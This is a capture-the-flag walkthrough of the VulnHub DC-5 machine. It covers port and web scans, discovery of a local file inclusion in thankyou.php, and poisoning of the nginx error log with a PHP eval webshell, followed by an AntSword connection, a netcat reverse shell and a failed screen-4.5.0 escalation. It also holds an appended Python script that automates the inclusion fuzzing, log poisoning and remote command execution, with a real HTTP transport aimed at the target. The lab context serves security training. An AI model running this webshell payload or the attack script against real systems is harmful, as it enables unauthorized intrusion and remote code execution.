[vulnhub] DC:5


Introduction

DC-5 is where the difficulty starts to climb. It mainly tests your understanding of file inclusion: once you have found a file inclusion vulnerability, what information should you look at, and how do you turn the inclusion into a shell? On the privilege escalation part I called it a draw.

Information Gathering

Port Scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:37 CST
Warning: 192.168.56.114 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.114
Host is up (0.00050s latency).
Not shown: 37405 filtered tcp ports (no-response), 28127 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
49405/tcp open unknown
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 116.67 seconds

TCP, Service, OS Scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:39 CST
Nmap scan report for 192.168.56.114
Host is up (0.00093s latency).

PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
49405/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

UDP Scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:39 CST
Warning: 192.168.56.114 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.114
Host is up (0.0016s latency).
Not shown: 65458 open|filtered udp ports (no-response), 75 closed udp ports (port-unreach)
PORT STATE SERVICE
111/udp open rpcbind
40520/udp open unknown
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 72.85 seconds

Simple Vuln Scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:40 CST
Nmap scan report for 192.168.56.114
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.114
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.114:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
111/tcp open rpcbind
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 74.57 seconds

nikto Vuln Scan:

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.114
+ Target Hostname: 192.168.56.114
+ Target Port: 80
+ Start Time: 2023-06-02 20:41:49 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.6.2
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-06-02 20:42:12 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

web fingerprint Scan:

http://192.168.56.114 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.6.2], IP[192.168.56.114], Title[Welcome], nginx[1.6.2]

Simple Web content discovery:


-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Jun 2 20:42:19 2023
URL_BASE: http://192.168.56.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.114/ ----
==> DIRECTORY: http://192.168.56.114/css/
==> DIRECTORY: http://192.168.56.114/images/
+ http://192.168.56.114/index.php (CODE:200|SIZE:4025)
---- Entering directory: http://192.168.56.114/css/ ----

---- Entering directory: http://192.168.56.114/images/ ----

-----------------
END_TIME: Fri Jun 2 20:42:25 2023
DOWNLOADED: 13836 - FOUND: 1

dirb turned up nothing useful, so I scanned again with feroxbuster.

┌──(kali㉿kali)-[~/vulnhub/DC/5/workSpace]
└─$ sudo feroxbuster -u http://192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,301,302,401,403

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.114
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 301, 302, 401, 403]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 7l 12w 184c http://192.168.56.114/images => http://192.168.56.114/images/
200 GET 145l 343w 2638c http://192.168.56.114/css/styles.css
200 GET 54l 560w 4292c http://192.168.56.114/about-us.php
200 GET 52l 525w 4100c http://192.168.56.114/solutions.php
200 GET 58l 752w 5645c http://192.168.56.114/faq.php
200 GET 54l 525w 4025c http://192.168.56.114/index.php
200 GET 72l 479w 4282c http://192.168.56.114/contact.php
200 GET 54l 525w 4025c http://192.168.56.114/
403 GET 7l 10w 168c http://192.168.56.114/css/
301 GET 7l 12w 184c http://192.168.56.114/css => http://192.168.56.114/css/

To sum up, all the scanning really told us is that port 80 serves a website behind nginx, and directory brute-forcing did not add much. Nothing left to do but work the website itself.

Web Exploitation

Browsing the site

Clicking back and forth through the first few pages turned up nothing. Putting a single quote (') into the contact form's fields to test for SQL injection gave nothing either. But while trying other possible injection points, I noticed that the year in the footer at the bottom of thankyou.php kept changing.

dc5-contact-1

dc-5-contact-2

Why would that change? Odd. Opening the developer console (F12) showed that the footer sits in a footer-wrapper element.

dc-5-footer-wrapper

Combined with the footer.php page found during directory scanning, I opened footer.php directly and refreshed it a few times: its value really does change.

dc-5-footer

What does all this tell us? That thankyou.php must be including footer.php. What we do not know is how: is the path hard-coded, or passed in as a parameter? With no other leads, the thing to try is fuzzing, on the assumption that the include takes a parameter.

File Inclusion

There are two things to fuzz: the name of the parameter that is accepted, and the location of the file.

dc5-bp-1

We fuzz with Burp Suite's Intruder. The advantage of Intruder is that it ships with built-in wordlists for parameter names and for path traversal. I used pitchfork mode: the first payload set (the variable name) is the Server-side variable names list, the second (the location) is Fuzzing - path traversal (single file). One caveat: pitchfork walks both lists in lockstep (entry 1 with entry 1, entry 2 with entry 2), so to try every parameter name against every path you want cluster bomb mode, which tests all combinations.

dc5-bp-2

The fuzzing shows that the parameter it accepts is indeed `file`.

Let's verify by hand:
dc5-lfi-manual

Works perfectly.

There is still a big problem, though: there is no file upload anywhere. So how do we get a shell?

Some searching shows that when a site behind nginx has a file inclusion bug, you can try to write a one-liner webshell into the error log or the access log and then connect to it with AntSword. The next question is where those logs are. They are usually under /var/log, but they could be somewhere else, so enumerate the likely locations with a wordlist, again with Burp Suite. This time sniper mode is enough, with the Local files - Linux wordlist. The include only helps if the log is readable by the user PHP runs as (on this box it is).

dc5-errorlog

Found it: the error log really is at /var/log/nginx/error.log. Next, craft a payload that gets written into it.

Getting a Shell

The crude but direct construction:

http://192.168.56.114/thankyou.php?file=<?php @eval($_REQUEST["shell"]); ?>

With the one-liner webshell as the file name, the include obviously fails, and the failure is written to the error log. The browser percent-encodes the `<`, `?` and quotes in the URL, but PHP decodes them again before include(), so the warning that reaches the log carries the raw PHP tag. Send it once: every copy that ends up in the log is executed on each later inclusion.

Verify:

dc5-errorlog-cat

It was indeed written.

Connect with AntSword.

dc-5-antsword

Connected. Write a reverse shell into /tmp, request it through the file inclusion, and we have a reverse shell.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvp 443
[sudo] password for kali:
listening on [any] 443 ...
192.168.56.114: inverse host lookup failed: Unknown host
connect to [192.168.56.144] from (UNKNOWN) [192.168.56.114] 53100
bash: cannot set terminal process group (482): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-5:~/html$
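The three steps above (fuzzing parameter name against traversal path, probing for a readable log, then poisoning the error log and executing through it), scripted as an added example; this is not the page's tooling. It assumes the target behaves as described: thankyou.php includes whatever the `file` parameter names, and PHP's include warnings are relayed into nginx's error log. `FakeDC5` is a constructed stand-in for the box so the script runs offline; pass `http_fetch` instead of `box.fetch` to run the same functions against the real target. The reverse shell step is unchanged: once `run_command` works, use it to drop the reverse shell into /tmp and include that file.

```python
"""Added example, not tooling from the page: the LFI discovery, log-path
discovery and error-log poisoning steps above, scripted end to end.
All HTTP goes through a `fetch(url) -> str` callable, so the same functions
run against the real box (http_fetch) or the constructed FakeDC5 below."""
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional, Tuple

Fetch = Callable[[str], str]
BASE = "http://192.168.56.114/thankyou.php"          # the including page found above
WEBSHELL = '<?php @eval($_REQUEST["shell"]); ?>'      # the one-liner the page uses
PASSWD_RE = re.compile(r"^root:[^\n]*:0:0:", re.MULTILINE)   # proof /etc/passwd came back
NGINX_ERR_RE = re.compile(r"\[(error|crit|warn)\] \d+#\d+:")  # nginx error-log line shape


def http_fetch(url: str, timeout: float = 5.0) -> str:
    """Real transport: one GET, body as text; any failure is an empty body."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return ""


def build_url(base: str, params: Dict[str, str]) -> str:
    """urlencode turns '<?php' into '%3C%3Fphp'; PHP decodes $_GET again before include()."""
    return base + "?" + urllib.parse.urlencode(params)


def find_lfi(fetch: Fetch, base: str, names: Iterable[str],
             paths: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Every parameter name against every path, i.e. Intruder's cluster bomb
    (pitchfork would only pair the two lists entry by entry)."""
    paths = list(paths)
    for name in names:
        for path in paths:
            if PASSWD_RE.search(fetch(build_url(base, {name: path}))):
                return name, path
    return None


def find_readable_log(fetch: Fetch, base: str, name: str,
                      candidates: Iterable[str]) -> Optional[str]:
    """First candidate whose inclusion comes back looking like an nginx error log.
    A log the PHP process cannot read just produces one more warning."""
    for log in candidates:
        if NGINX_ERR_RE.search(fetch(build_url(base, {name: log}))):
            return log
    return None


def poison_log(fetch: Fetch, base: str, name: str) -> None:
    """Send the webshell once, as the file name: include() fails and PHP's warning,
    carrying the raw name, is relayed into nginx's error log. Once is enough; every
    extra copy in the log is eval()'d again on each later inclusion."""
    fetch(build_url(base, {name: WEBSHELL}))


def run_command(fetch: Fetch, base: str, name: str, log: str, cmd: str) -> str:
    """Include the poisoned log; the `shell` parameter is what eval() executes."""
    return fetch(build_url(base, {name: log, "shell": f"system({cmd!r});"}))


class FakeDC5:
    """Constructed stand-in for the target so the flow runs offline: thankyou.php
    includes $_GET['file'], and PHP warnings land in the nginx error log."""
    LOG = "/var/log/nginx/error.log"

    def __init__(self) -> None:
        self.errors: List[str] = []

    def fetch(self, url: str) -> str:
        q: Dict[str, str] = {}
        for pair in urllib.parse.urlsplit(url).query.split("&"):
            k, _, v = pair.partition("=")
            q[urllib.parse.unquote_plus(k)] = urllib.parse.unquote_plus(v)
        wanted = q.get("file")
        if wanted is None:                      # any other parameter is ignored
            return "<html>Thank you</html>"
        if wanted.endswith("etc/passwd"):
            return "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"
        if wanted == self.LOG:
            body = "\n".join(self.errors)
            if "shell" in q:                    # crude stand-in for PHP executing the tag
                body = body.replace(WEBSHELL, "uid=33(www-data) gid=33(www-data)")
            return body
        self.errors.append('2023/06/02 21:00:00 [error] 482#0: *1 FastCGI sent in stderr: '
                           f'"PHP Warning: include({wanted}): failed to open stream"')
        return "<html>Thank you</html>"


if __name__ == "__main__":
    box = FakeDC5()                     # use http_fetch instead of box.fetch for the real target
    hit = find_lfi(box.fetch, BASE, ["page", "include", "file"], ["../../../../etc/passwd"])
    if hit is None:
        raise SystemExit("no inclusion found")
    print("LFI parameter/path:", hit)
    log = find_readable_log(box.fetch, BASE, hit[0], ["/var/log/apache2/error.log", FakeDC5.LOG])
    print("readable log:", log)
    poison_log(box.fetch, BASE, hit[0])
    print(run_command(box.fetch, BASE, hit[0], log or FakeDC5.LOG, "id"))
```

`find_readable_log` relies on the log already holding at least one nginx error line; the failed probes from the earlier fuzzing normally guarantee that. Keep the poisoning request to a single call: the log is executed in full on every inclusion, so a second copy of the tag, or a broken one, makes every later request noisier or breaks it outright.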

Privilege Escalation

First thing, `sudo -l`. There was no tty, so I spawned one with python (import pty) and ran sudo again, only to find I have no password for it. Fine.

Check for SUID binaries.

www-data@dc-5:/etc$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

A look at GTFOBins shows that screen-4.5.0 can be abused to write files.

But trying that did not work; every write failed. So I looked for other ways, and searchsploit really does turn up an exploit for it.

Downloaded and run, it failed. Online advice says to split it into three files, compile locally, then upload them to the target.

Trying that, the kernel version gap is too large, so the binaries are missing libraries when run on the target; compiling on the target is also missing libraries. I spent a long time on it without finding a good solution.

In any case, the approach and the path to root are right; I'll count the last step as done. Calling it a draw.